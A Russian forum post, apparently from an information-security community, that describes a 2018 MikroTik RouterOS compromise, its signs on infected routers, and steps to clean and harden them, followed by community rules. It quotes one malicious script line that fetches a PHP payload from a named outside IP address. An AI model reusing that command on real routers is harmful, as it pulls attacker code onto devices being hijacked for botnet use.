Уязвимости MikroTik
К сожалению скриншотов не будет. Будет сухой текст.
23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.
Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.
Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.
Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:
/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http
В файлах соответственно mikrotik.php
Отключаются все запрещающие правила фаервола.
Создаются задачи в планировщике по запуску скрипта.
Открывается сокс-прокси на нестандартном порту.
Меняются адреса днс-серверов.
Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.
Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.
Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.
Ну пару советов по безопасности:
IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.
Грамотно настроить фаерволл.
В случае если факт взлома был зафиксирован - сменить пароль на микротик.
Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533
Информационная безопасность IT
1.4K постов25.5K подписчиков
Правила сообщества
Обязательно к прочтению для авторов:
1. Если вы добавляете пост, утверждающий об утечке данных или наличии дыр в системе, предоставьте ссылку на источники или технически подкованное расследование. Посты из разряда "Какой-то банк слил данные, потому что мне звонили мошенники" будут выноситься в общую ленту.
2. Все вопросы "Как обезопасить сервер\приложение\устройство" - в лигу "Компьютер это просто".
Обязательно к прочтению для всех:
Добавление ссылки разрешено если она не содержит описание коммерческих (платных) продуктов и/или идентификаторов для отслеживания перехода и для доступа не нужен пароль или оплата в т.ч. интернет-ресурсы, каналы (от 3-х тематических видео), блоги, группы, сообщества, СМИ и т.д.
Запрещены политические holy wars.
По решению модератора или администратора сообщества пользователь будет забанен за:
1. Флуд и оскорбление пользователя, в т.ч. провокация спора, флуда, холивара (высказывание без аргументации о конкретной применимости конкретного решения в конкретной ситуации), требование уже данного ответа, распространение сведений порочащих честь и репутацию, принижающих квалификацию оппонента, переходы на личности.
2. Публикацию поста/комментария не соответствующего тематике сообщества, в том числе обсуждение администраторов и модераторов сообщества, для этого есть специальное сообщество.
3. За обвинение в киберпреступной деятельности.
4. За нарушение прочих Правил Пикабу.